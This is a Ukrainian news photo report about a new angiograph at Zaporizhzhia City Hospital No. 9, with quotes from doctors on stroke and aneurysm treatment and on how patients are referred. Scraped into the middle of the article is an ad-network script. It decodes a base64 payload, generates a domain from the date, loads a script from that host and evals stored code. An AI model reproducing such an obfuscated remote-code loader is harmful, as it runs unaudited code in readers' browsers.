Лікувати інсульт стало легше: у Запорізькій лікарні №9 з’явився сучасний ангіограф для боротьби з судинними патологіями (ФОТОРЕПОРТАЖ)

За допомогою нового апарата висококваліфіковані спеціалісти рентгенодіагностичного відділення КНП «Міська лікарня №9» ЗМР вже проводять операції та обстеження, котрі дозволяють рятувати або значно покращувати життя пацієнтам. 

Ангіографічний комплекс сьогодні презентували представникам місцевих ЗМІ. Кореспонденти “Акцента” побачили нове обладнання у роботі і дізналися, як воно допоможе лікувати тяжкі патології.

Що дозволяє новий
ангіографічний комплекс

Медики пояснюють, що блок обладнаний сучасним ангіографічним комплексом дозволяє проводити ендоваскулярні оперативні втручання при патології церебральних і прецеребральних артерій (аневризми судин головного мозку, церебральні АВМ, стенози судин кровопостачаючих головний мозок, тромбектомія в гострому періоді інсульту), коронарних артерій та іншої судинної патології.

Завдяки сучасній рентгенопераційній й наявності у лікарні комплексного інсультного центру у поєднанні із сучасними методами нейровізуалізації тепер є можливість покращити рівень надання допомоги населенню за такої грізної патології як інсульт. 

Технічні характеристики ангіографічного комплексу
включають можливість отримання тривимірної реконструкції, дозволяють отримати
детальну інформацію про особливості ураження судин і застосовувати в лікуванні
найсучасніші методики.

Це висококласний ангіограф, який дозволяє нам бачити проблему у судині. Лікар, проводячи внутрішньо-артеріальну маніпуляцію, вирішує цю проблему. Не гине мозок, не гине міокард, не гинуть кінцівки при емболіях. Ми вирішуємо досить широкий спектр питань”, — розповідає про переваги прилада в.о. медичного директора лікарні Олександр Вєдєнєєв.


В.о. медичного директора лікарні Олександр Вєдєнєєв Перші успіхи у лікуванні
з ангіографом

За наявності сучасної рентгенопераційної та витратних
матеріалів, протягом першого тижня роботи, у лікарів була можливість надати
допомогу пацієнтам із субарахноїдальним крововиливом внаслідок розриву
церебральних аневризм, стенозами внутрішніх сонних та хребтових артерій.
Виконано тромбектомію при ішемічному інсульті.

За 1,5 тижня ми вже пролікували 17 хворих та провели 6 операцій. Хвора, яка була оперована через годину після потрапляння у лікарню з оклюзією мозкової артерії, повністю відновилася і вже самостійно рухається коридорами інсультного відділення”, — розповідає доцент кафедри медицини катастроф, військової медицини та нейрохірургії ЗДМУ, лікар-нейрохірург рентгенохірургічного блоку Олексій Полковніков.  var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }


 Доцент кафедри медицини катастроф, військової медицини та нейрохірургії ЗДМУ, лікар-нейрохірург рентгенохірургічного блоку Олексій Полковніков Яких пацієнтів
направляють на ангіограф

Нове обладнання буде працювати для пацієнтів абсолютно
безкоштовно і дозволить боротися з цілою низкою патологій. Направлення на
ангіограф надає сімейний лікар. Також обладнання використовують, щоб допомогти
пацієнтам, які вже проходять лікування у стаціонарному відділенні.

“Блок дозволить допомогти пацієнтам у період гострого інсульту, з аневризмами, стенозами. Якщо пацієнт потрапляє до нас зі стаціонарного відділення, йому надається допомога. Також пацієнти звертаються до сімейного лікаря і стають у чергу, після чого їм буде надано цю медичну допомогу”, — каже завідувачка відділенням рентгенодіагностики , лікар вищої категорії Олена Копіченко.


Завідувачка відділенням рентгенодіагностики, лікар вищої категорії Олена Копіченко.

Лікарі кажуть, що запобігти тяжким судинним патологіям
можна завдяки якісній профілактиці. До лікарні слід звертатися, якщо виникли
головні болі, зникає зір, або з’явилося відчуття слабкості у кінцівках.

«Своєчасна профілактика цереброваскулярної патології дозволяє уникнути життєзагрозного інсульту. Тому, якщо у вас раптово виник головний біль, короткочасно зник зір на одне око або з’явилася слабкість у кінцівках з одного боку, порушення мови — необхідно терміново звертатися за допомогою до фахівців! Виявлені при обстеженні стенози сонних та хребтових артерій, аневризми судин головного мозку, артеріо-венозні мальформації головного мозку є загрозливими для здоров’я та життя змінами в судинах. Обов’язково консультуйтеся зі спеціалістом», – пояснює лікарка-нейрохірургиня рентгенохірургічного блоку Ніна Ізбицька.


Лікарка-нейрохірургиня рентгенохірургічного блоку Ніна Ізбицька Крок у майбутнє

Лікарі КНП «Міська лікарня №9» ЗМР впевнені, що нове
обладнання допоможе рятувати життя пацієнтам медичного закладу. Крім того,
ангіограф дозволить зменшити кількість людей, які отримують глибоку
інвалідність через судинні патології. Обладнання, яке коштує близько 28
мільйонів гривень, суттєво підіймає рівень медицини в області. Наразі це лише третій подібний
прилад у лікарнях на Запоріжжі.

Судинна патологія виходить на перший план у смертності і інвалідизації пацієнтів, тому це надважлива річ, яка має бути у клініці високого рівня. На даному етапі ми можемо надавати допомогу 24/7 365 днів на рік, і навіть більше. Працює ціла команда фахівців. Не тільки при мозкових і кардіальних катастрофах, але й при ураженні кінцівок тощо… Спектр дуже широкий. Все це робиться за кошт НСЗУ безкоштовно для громадян України”, — зауважує в.о. медичного директора лікарні Олександр Вєдєнєєв. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/likuvati-insult-stalo-legshe-u-zaporizkij-likarni-9-z-yavivsya-suchasnij-angiograf-dlya-borotbi-z-sudinnimi-patologiyami-fotoreportazh/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top